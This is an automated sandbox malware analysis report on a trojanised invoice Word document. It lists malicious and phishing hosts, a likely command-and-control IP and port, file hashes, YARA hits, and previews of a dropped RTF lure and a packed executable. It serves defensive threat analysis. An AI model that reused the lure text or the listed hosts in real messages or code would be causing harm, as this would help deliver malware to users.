                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegSvcs.exe, 0000000C.00000002.439295292.000000000230C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002218000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002566000.00000004.00000800.00020000.00000000.sdmp, tmpD804.tmp.12.dr, tmp9D43.tmp.12.dr, tmp6274.tmp.12.dr, tmp27E3.tmp.12.dr, tmpD7E3.tmp.12.dr, tmp3D9E.tmp.12.dr, tmpB2E0.tmp.12.dr, tmpB2B0.tmp.12.dr, tmp784E.tmp.12.dr, tmpED42.tmp.12.dr, tmp780F.tmp.12.dr, tmpED81.tmp.12.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/CheckConnectRegSvcs.exe, 0000000C.00000002.439295292.00000000020A1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchRegSvcs.exe, 0000000C.00000002.439295292.000000000230C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002218000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002566000.00000004.00000800.00020000.00000000.sdmp, tmpD804.tmp.12.dr, tmp9D43.tmp.12.dr, tmp6274.tmp.12.dr, tmp27E3.tmp.12.dr, tmpD7E3.tmp.12.dr, tmp3D9E.tmp.12.dr, tmpB2E0.tmp.12.dr, tmpB2B0.tmp.12.dr, tmp784E.tmp.12.dr, tmpED42.tmp.12.dr, tmp780F.tmp.12.dr, tmpED81.tmp.12.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.google.com/favicon.icotmpED81.tmp.12.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://ac.ecosia.org/autocomplete?q=RegSvcs.exe, 0000000C.00000002.439295292.000000000230C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002218000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002566000.00000004.00000800.00020000.00000000.sdmp, tmpD804.tmp.12.dr, tmp9D43.tmp.12.dr, tmp6274.tmp.12.dr, tmp27E3.tmp.12.dr, tmpD7E3.tmp.12.dr, tmp3D9E.tmp.12.dr, tmpB2E0.tmp.12.dr, tmpB2B0.tmp.12.dr, tmp784E.tmp.12.dr, tmpED42.tmp.12.dr, tmp780F.tmp.12.dr, tmpED81.tmp.12.drfalse
                      • URL Reputation: safe
                      unknown
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0EQNEDT32.EXE, 00000009.00000003.391274570.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391505550.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391551132.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.391282505.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439171465.00000000008A3000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://universalmovies.top/EQNEDT32.EXE, 00000009.00000003.391282505.000000000057D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391505550.000000000057E000.00000004.00000020.00020000.00000000.sdmp, universalmovies.top.url.0.drtrue
                      • Avira URL Cloud: phishing
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressingRegSvcs.exe, 0000000C.00000002.439295292.00000000020A1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/GetUpdatesResponseRegSvcs.exe, 0000000C.00000002.439295292.00000000020A1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/EnvironmentSettingsResponseRegSvcs.exe, 0000000C.00000002.439295292.00000000020A1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://185.38.142.10:7474t-RegSvcs.exe, 0000000C.00000002.439295292.0000000002493000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://ns.adobe.RegSvcs.exe, 0000000C.00000002.439054948.0000000000037000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.ipify.RegSvcs.exefalse
                      • Avira URL Cloud: safe
                      unknown
                      https://secure.comodo.com/CPS0EQNEDT32.EXE, 00000009.00000003.391274570.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391505550.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391551132.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.391282505.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439171465.00000000008A3000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegSvcs.exe, 0000000C.00000002.439295292.000000000230C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002218000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002566000.00000004.00000800.00020000.00000000.sdmp, tmpD804.tmp.12.dr, tmp9D43.tmp.12.dr, tmp6274.tmp.12.dr, tmp27E3.tmp.12.dr, tmpD7E3.tmp.12.dr, tmp3D9E.tmp.12.dr, tmpB2E0.tmp.12.dr, tmpB2B0.tmp.12.dr, tmp784E.tmp.12.dr, tmpED42.tmp.12.dr, tmp780F.tmp.12.dr, tmpED81.tmp.12.drfalse
                      • URL Reputation: safe
                      unknown
                      http://crl.entrust.net/2048ca.crl0EQNEDT32.EXE, 00000009.00000003.391274570.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391551132.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439171465.00000000008A3000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://api.ipify.orgcooRegSvcs.exefalse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/soap/actor/nextRegSvcs.exe, 0000000C.00000002.439295292.00000000020A1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RegSvcs.exe, 0000000C.00000002.439295292.000000000230C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002218000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002566000.00000004.00000800.00020000.00000000.sdmp, tmpD804.tmp.12.dr, tmp9D43.tmp.12.dr, tmp6274.tmp.12.dr, tmp27E3.tmp.12.dr, tmpD7E3.tmp.12.dr, tmp3D9E.tmp.12.dr, tmpB2E0.tmp.12.dr, tmpB2B0.tmp.12.dr, tmp784E.tmp.12.dr, tmpED42.tmp.12.dr, tmp780F.tmp.12.dr, tmpED81.tmp.12.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://universalmovies.top/FB8RjEQNEDT32.EXE, 00000009.00000003.391282505.000000000057D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391505550.000000000057E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      172.67.162.95
                      unknownUnited States
                      13335CLOUDFLARENETUSfalse
                      104.21.74.191
                      universalmovies.topUnited States
                      13335CLOUDFLARENETUStrue
                      185.38.142.10
                      unknownPortugal
                      47674NETSOLUTIONSNLtrue
                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1461841
                      Start date and time:2024-06-24 18:22:02 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 7m 2s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:defaultwindowsofficecookbook.jbs
                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                      Number of analysed new started processes analysed:15
                      Number of new started drivers analysed:1
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.doc
                      Detection:MAL
                      Classification:mal100.troj.spyw.expl.evad.winDOC@6/54@16/3
                      EGA Information:
                      • Successful, ratio: 66.7%
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 60
                      • Number of non-executed functions: 271
                      Cookbook Comments:
                      • Found application associated with file extension: .doc
                      • Found Word or Excel or PowerPoint or XPS Viewer
                      • Attach to Office via COM
                      • Scroll down
                      • Close Viewer
                      • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe
                      • Excluded IPs from analysis (whitelisted): 104.26.12.31, 172.67.75.172, 104.26.13.31
                      • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net
                      • Execution Graph export aborted for target EQNEDT32.EXE, PID 3404 because there are no executed function
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.doc
                      TimeTypeDescription
                      12:23:10API Interceptor44x Sleep call for process: EQNEDT32.EXE modified
                      12:23:14API Interceptor105x Sleep call for process: RegSvcs.exe modified
                      InputOutput
                      URL: Office document Model: gpt-4o
                      ```json{  "riskscore": 0,  "reasons": "The provided screenshot does not contain any visually prominent button or link. The text in the screenshot appears to be a list of items or codes, and there is no language that creates a sense of urgency or interest, such as 'Click here to view document' or 'Open the link to see your invoice.' Additionally, there is no impersonation of well-known brands or any indication that the text is connected to a prominent button or link. Therefore, the document does not exhibit characteristics typically associated with phishing or malware distribution."}
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      172.67.162.95Kobe 045EX07227 CLG6739.docx.docGet hashmaliciousUnknownBrowse
                        Kobe 045EX07227 CLG6739.docx.docGet hashmaliciousUnknownBrowse
                          PROFORMAXINVOICE.docx.docGet hashmaliciousLokibotBrowse
                            MV HTK Lavender.docGet hashmaliciousLokibotBrowse
                              PUO.docx.docGet hashmaliciousHTMLPhisherBrowse
                                336HB7m70J.rtfGet hashmaliciousAgentTeslaBrowse
                                  LIW_009.docx.docGet hashmaliciousFormBookBrowse
                                    PAYMENT SLIP.docGet hashmaliciousAgentTeslaBrowse
                                      PAYROLL.docGet hashmaliciousFormBookBrowse
                                        APR PAYROLL.docGet hashmaliciousFormBookBrowse
                                          104.21.74.191file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                          • tuong.me/wp-login.php
                                          185.38.142.10MSH INV 2024-0117 Secure Payment Invoice for .exeGet hashmaliciousRedLineBrowse
                                          • 185.38.142.10:7474/
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          universalmovies.topKobe 045EX07227 CLG6739.docx.docGet hashmaliciousUnknownBrowse
                                          • 172.67.162.95
                                          Kobe 045EX07227 CLG6739.docx.docGet hashmaliciousUnknownBrowse
                                          • 172.67.162.95
                                          PROFORMAXINVOICE.docx.docGet hashmaliciousLokibotBrowse
                                          • 172.67.162.95
                                          MV HTK Lavender.docGet hashmaliciousLokibotBrowse
                                          • 172.67.162.95
                                          PUO 2.docGet hashmaliciousHTMLPhisherBrowse
                                          • 104.21.74.191
                                          PUO.docx.docGet hashmaliciousHTMLPhisherBrowse
                                          • 172.67.162.95
                                          336HB7m70J.rtfGet hashmaliciousAgentTeslaBrowse
                                          • 172.67.162.95
                                          lrShdpqqbi.rtfGet hashmaliciousFormBookBrowse
                                          • 104.21.74.191
                                          LIW_009.docx.docGet hashmaliciousFormBookBrowse
                                          • 172.67.162.95
                                          New PO for Project - 00775, 00875 02195.docGet hashmaliciousUnknownBrowse
                                          • 104.21.74.191
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          CLOUDFLARENETUSQUOTATION PT INDONESIA.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.26.13.205
                                          DHL_Shipment_Details.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                          • 172.67.74.152
                                          PO-2405280.xlsGet hashmaliciousRemcosBrowse
                                          • 104.21.26.96
                                          Po-6528279-SK.xlsGet hashmaliciousAgentTeslaBrowse
                                          • 188.114.97.3
                                          Potwierdzenie zam#U00f3wienia.doc.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                          • 172.67.74.152
                                          doc2406.vbsGet hashmaliciousFormBookBrowse
                                          • 172.67.75.40
                                          PO53467.xlsGet hashmaliciousRemcosBrowse
                                          • 104.21.26.96
                                          https://erpportal.com/1331/LV/forms/new/100110215%7C1AC492413EB45535E0632D16670A3281Get hashmaliciousUnknownBrowse
                                          • 162.247.243.29
                                          334427.exeGet hashmaliciousGuLoaderBrowse
                                          • 172.67.74.152
                                          http://bleachinjectionuncommon.comGet hashmaliciousUnknownBrowse
                                          • 104.18.32.137
                                          NETSOLUTIONSNLMSH INV 2024-0117 Secure Payment Invoice for .exeGet hashmaliciousRedLineBrowse
                                          • 185.38.142.10
                                          sclfmLKwR7.elfGet hashmaliciousGafgyt, MiraiBrowse
                                          • 185.38.142.103
                                          3nYvEPuDi1.elfGet hashmaliciousGafgyt, MiraiBrowse
                                          • 185.38.142.103
                                          DS4T3FyXbu.elfGet hashmaliciousGafgyt, MiraiBrowse
                                          • 185.38.142.103
                                          pDHAW6Eo6E.elfGet hashmaliciousGafgytBrowse
                                          • 185.38.142.103
                                          q5TDXPUPJg.elfGet hashmaliciousGafgytBrowse
                                          • 185.38.142.22
                                          K8pQUoHdUc.elfGet hashmaliciousGafgytBrowse
                                          • 185.38.142.22
                                          PWkv0lkpNM.elfGet hashmaliciousGafgytBrowse
                                          • 185.38.142.22
                                          r4S9Lebe4t.elfGet hashmaliciousGafgytBrowse
                                          • 185.38.142.22
                                          7yZNYj8ByC.elfGet hashmaliciousGafgytBrowse
                                          • 185.38.142.22
                                          CLOUDFLARENETUSQUOTATION PT INDONESIA.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.26.13.205
                                          DHL_Shipment_Details.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                          • 172.67.74.152
                                          PO-2405280.xlsGet hashmaliciousRemcosBrowse
                                          • 104.21.26.96
                                          Po-6528279-SK.xlsGet hashmaliciousAgentTeslaBrowse
                                          • 188.114.97.3
                                          Potwierdzenie zam#U00f3wienia.doc.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                          • 172.67.74.152
                                          doc2406.vbsGet hashmaliciousFormBookBrowse
                                          • 172.67.75.40
                                          PO53467.xlsGet hashmaliciousRemcosBrowse
                                          • 104.21.26.96
                                          https://erpportal.com/1331/LV/forms/new/100110215%7C1AC492413EB45535E0632D16670A3281Get hashmaliciousUnknownBrowse
                                          • 162.247.243.29
                                          334427.exeGet hashmaliciousGuLoaderBrowse
                                          • 172.67.74.152
                                          http://bleachinjectionuncommon.comGet hashmaliciousUnknownBrowse
                                          • 104.18.32.137
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          05af1f5ca1b87cc9cc9b25185115607dPO-2405280.xlsGet hashmaliciousRemcosBrowse
                                          • 172.67.162.95
                                          • 104.21.74.191
                                          Po-6528279-SK.xlsGet hashmaliciousAgentTeslaBrowse
                                          • 172.67.162.95
                                          • 104.21.74.191
                                          PO53467.xlsGet hashmaliciousRemcosBrowse
                                          • 172.67.162.95
                                          • 104.21.74.191
                                          PO-240528.xlsGet hashmaliciousRemcosBrowse
                                          • 172.67.162.95
                                          • 104.21.74.191
                                          Invoices_05062024.xlsGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 172.67.162.95
                                          • 104.21.74.191
                                          HSBC Customer Information.xlsGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 172.67.162.95
                                          • 104.21.74.191
                                          wssvZm9dNK.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                          • 172.67.162.95
                                          • 104.21.74.191
                                          Bills Paid.xlsGet hashmaliciousRemcosBrowse
                                          • 172.67.162.95
                                          • 104.21.74.191
                                          Zahlung.docx.docGet hashmaliciousUnknownBrowse
                                          • 172.67.162.95
                                          • 104.21.74.191
                                          NEW ORDER.docx.docGet hashmaliciousUnknownBrowse
                                          • 172.67.162.95
                                          • 104.21.74.191
                                          7dcce5b76c8b17472d024758970a406bPO-2405280.xlsGet hashmaliciousRemcosBrowse
                                          • 104.21.74.191
                                          Po-6528279-SK.xlsGet hashmaliciousAgentTeslaBrowse
                                          • 104.21.74.191
                                          PO53467.xlsGet hashmaliciousRemcosBrowse
                                          • 104.21.74.191
                                          PO-240528.xlsGet hashmaliciousRemcosBrowse
                                          • 104.21.74.191
                                          Bills Paid.xlsGet hashmaliciousRemcosBrowse
                                          • 104.21.74.191
                                          5698.docx.docGet hashmaliciousUnknownBrowse
                                          • 104.21.74.191
                                          IlWPStOFHj.rtfGet hashmaliciousRemcosBrowse
                                          • 104.21.74.191
                                          V8ZnJcPOUY.rtfGet hashmaliciousHTMLPhisherBrowse
                                          • 104.21.74.191
                                          PO00595871.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                          • 104.21.74.191
                                          A24-00342B139336 #TW_Inquiry.xlsGet hashmaliciousSmokeLoaderBrowse
                                          • 104.21.74.191
                                          No context
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):131072
                                          Entropy (8bit):0.02574218694590596
                                          Encrypted:false
                                          SSDEEP:6:I3DPc91g0VvxggLRxk1/fxlHH4dRXv//4tfnRujlw//+GtluJ/eRuj:I3DPs1NZC1nx5HmvYg3J/
                                          MD5:2F5BD867B5F59EAAE3CA96DBBD1A7376
                                          SHA1:8C2ABE7614CC0E63698ACCD8E9083C776AD5D523
                                          SHA-256:10BE461A5B839C7734E97D90C328E00E4599AC477D63D371F4B91FD303C263C3
                                          SHA-512:E774F8EAFCAE56694E88AE70F00D21983073D3FAF9F8435B3837157B54091569F2C9911384B8E1B775B661968BC528DD79A2B81F4539A876F666DE696F084ABC
                                          Malicious:false
                                          Reputation:low
                                          Preview:......M.eFy...z...[N..H.s...L.S,...X.F...Fa.q............................&}...#O.UO.j.............L.6@..J.........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:Rich Text Format data, version 1
                                          Category:dropped
                                          Size (bytes):618938
                                          Entropy (8bit):3.5824693010060775
                                          Encrypted:false
                                          SSDEEP:6144:IwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAqtUn:+u
                                          MD5:2D1B096A33D1B673FD06DB9F3E861761
                                          SHA1:3C0A1D1BD1B54381DF8769ECC173E8635FEA366E
                                          SHA-256:BF89362748B9E66C11AAA49DDF83B1665FE038D04225B36DE4F26CFFC11A0F3D
                                          SHA-512:32156517472C8C4A6998E58BB90E0A684516A11C403D87524A8561F647901CDB9413DD71B55DF4DE52C88E5E522E06EE9565FC6DC653EC8F49BA5C58A3D5034E
                                          Malicious:false
                                          Yara Hits:
                                          • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\notorious[1].doc, Author: ditekSHen
                                          Reputation:low
                                          Preview:{\rtf1..{\*\WauwWb33kVtBeFXoF5Me8bbkaCC88dqXB1LN0s84saDXfy7wNEIkF6fwo9WbTXUa8pudD9TZmbxq2sMJ09BBYE4OUwb26mMAnnIl6iE6rMnAeGPSXbh0yHxd3K6UwdemYg}..{\744345958please click Enable editing from the yellow bar above.The independent auditors. opinion says the financial statements are fairly stated in accordance with the basis of accounting used by your organization. So why are the auditors giving you that other letter In an audit of financial statements, professional standards require that auditors obtain an understanding of internal controls to the extent necessary to plan the audit. Auditors use this understanding of internal controls to assess the risk of material misstatement of the financial statements and to design appropriate audit procedures to minimize that risk.The definition of good internal controls is that they allow errors and other misstatements to be prevented or detected and corrected by (the nonprofit.s) employees in the normal course of performing their duties. If the audit
                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                          Category:dropped
                                          Size (bytes):644096
                                          Entropy (8bit):7.796206243772775
                                          Encrypted:false
                                          SSDEEP:12288:SYV6MorX7qzuC3QHO9FQVHPF51jgcN6S5UesUInNnpo2R2:hBXu9HGaVHN6S5U5Rn/Y
                                          MD5:901A623DBCCAA22525373CD36195EE14
                                          SHA1:9ADB6DDDB68CD7E116DA9392E7EE63A8FA394495
                                          SHA-256:B5E250A95073B5DFE33F66C13CC89DA0FC8D3AF226E5EFB06BB8FCFD9A4CD6EC
                                          SHA-512:EABEBA0EB9AE7E39577A7E313E50807CEE1B888F1C8FF0FA375E5DE9451A66471C791C23EA4F4AF85151F96B065D55E8C1320026D8503A048A3E5968F8EFFC1D
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 50%
                                          Reputation:low
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L...."yf.........."......p...p....................@..........................p............@...@.......@.....................Dg..$.......Dg..................hk......................................t...H...........................................UPX0....................................UPX1.....p.......d..................@....rsrc....p.......l...h..............@..............................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:Rich Text Format data, version 1
                                          Category:dropped
                                          Size (bytes):618938
                                          Entropy (8bit):3.5824693010060775
                                          Encrypted:false
                                          SSDEEP:6144:IwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAqtUn:+u
                                          MD5:2D1B096A33D1B673FD06DB9F3E861761
                                          SHA1:3C0A1D1BD1B54381DF8769ECC173E8635FEA366E
                                          SHA-256:BF89362748B9E66C11AAA49DDF83B1665FE038D04225B36DE4F26CFFC11A0F3D
                                          SHA-512:32156517472C8C4A6998E58BB90E0A684516A11C403D87524A8561F647901CDB9413DD71B55DF4DE52C88E5E522E06EE9565FC6DC653EC8F49BA5C58A3D5034E
                                          Malicious:false
                                          Yara Hits:
                                          • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D9B70A7F.doc, Author: ditekSHen
                                          Reputation:low
                                          Preview:{\rtf1..{\*\WauwWb33kVtBeFXoF5Me8bbkaCC88dqXB1LN0s84saDXfy7wNEIkF6fwo9WbTXUa8pudD9TZmbxq2sMJ09BBYE4OUwb26mMAnnIl6iE6rMnAeGPSXbh0yHxd3K6UwdemYg}..{\744345958please click Enable editing from the yellow bar above.The independent auditors. opinion says the financial statements are fairly stated in accordance with the basis of accounting used by your organization. So why are the auditors giving you that other letter In an audit of financial statements, professional standards require that auditors obtain an understanding of internal controls to the extent necessary to plan the audit. Auditors use this understanding of internal controls to assess the risk of material misstatement of the financial statements and to design appropriate audit procedures to minimize that risk.The definition of good internal controls is that they allow errors and other misstatements to be prevented or detected and corrected by (the nonprofit.s) employees in the normal course of performing their duties. If the audit
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:Composite Document File V2 Document, Cannot read section info
                                          Category:dropped
                                          Size (bytes):6144
                                          Entropy (8bit):3.891448580945385
                                          Encrypted:false
                                          SSDEEP:48:rlyrUnkMP3WtgigVNsl4p2larliwjbhqexP1vXzf4GVERFX:5yr8kMP3WtgBNEOrliwjbh51vXzfb6
                                          MD5:AB2121C164B215FA499E35EFF27EF06C
                                          SHA1:6ECD4DD8F558EDC74C3726832238C73363DF0844
                                          SHA-256:B120F10A9C4F42DD290DBED490C4B697E235E34C89658D85C5CC9B3B32A029B8
                                          SHA-512:15D28D68080B675E1EA5C1574F03BF0F34110D887E87C3DBA33EF91C3B95A1B284B4FBED9967909DF5D6466498C9AD5A102F167E7B8D2BECFAB393C7542AA120
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          Reputation:low
                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):46874
                                          Entropy (8bit):3.551464186925344
                                          Encrypted:false
                                          SSDEEP:768:uaWvW5Kq2g0Zos0SCWiMuz1rqAyLt+eqViz9yCFcEhZVsft:FgemiDvwxKrK2ft
                                          MD5:AC7C710B6CA9D66ED9923D65C708B21B
                                          SHA1:756E2D7C42EF9BF05DA7EA871B077BB6DAFCD8E7
                                          SHA-256:C1BEA8318A21530E776F4E3336A3F5E8AFE04F52FBB44F254304A9F36C570B68
                                          SHA-512:B366139A262F47A8C38FC1B5E649F9529E5E89471FF34B543A484737F84C6AF7185AB363946BFBD17DB9BA6642D0CE5520BEA236693CA27E3AF123816809F65C
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:..d.M.B.C.....B.E.S.O.N.D.E.R.H.E.D.E. .B.E.S.O.N.D.E.R.H.E.D.E. .V.I.R. .H.I.E.R.D.I.E. .M.A.A.N.D.....D.R.A.E.N.D.E. .N.R... .H.O.E.V.....3.0.2.0.8. .N.B.C. .D.R.A.A.G. .3.0. .S.T.K.....3.0.3.0.8. .N.B.C. .D.R.A.A.G. .6. .S.T.K.....3.2.0.0.7.X. .N.B.C. .D.R.A.A.G. .7.4. .S.T.K.....3.3.0.0.5. .N.B.C. .w.a.t. .5. .s.t.e.l.l.e. .d.r.a.....5.2.7.9.9. ./. .8.0.0.U. .(.2.5.8.7.7./.2.1.). .N.B.C. .w.a.t. .3.0. .P.C.S. .d.r.a.....6.0.0.1. .N.B.C. .w.a.t. .1.0.0. .s.t.u.k.s. .d.r.a.....6.0.0.4. .N.B.C. .w.a.t. ...................f...h...................................R...T..................................................................................................................................................................................................................................................................................................<...$..$.If........!v..h.#v..9.:V....l...,..t.......9..6.,.....5.....9.9...../.............B.....a..].p............yt%~D.....d........gd%
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1024
                                          Entropy (8bit):0.05390218305374581
                                          Encrypted:false
                                          SSDEEP:3:ol3lYdn:4Wn
                                          MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1536
                                          Entropy (8bit):1.3540074910490207
                                          Encrypted:false
                                          SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlb6:IiiiiiiiiifdLloZQc8++lsJe1Mz9/n
                                          MD5:5D86FAB4B71EDB7712C5D759D7F52023
                                          SHA1:6E8D73A485A139E85F6205AB7786027EDA8A5D12
                                          SHA-256:4ABB3FFDF5183FCE91387D250CBF331FF9FFD618BE4D3C5A031DA04A1F241201
                                          SHA-512:0CB51F9352C858469C116171A3266D1C0BCC241C2FE51071C34561E73AF076E7EC7BD144BE63D7E4F666153FB790A3D455BB220FE24357AEA27624BB2EB20C52
                                          Malicious:false
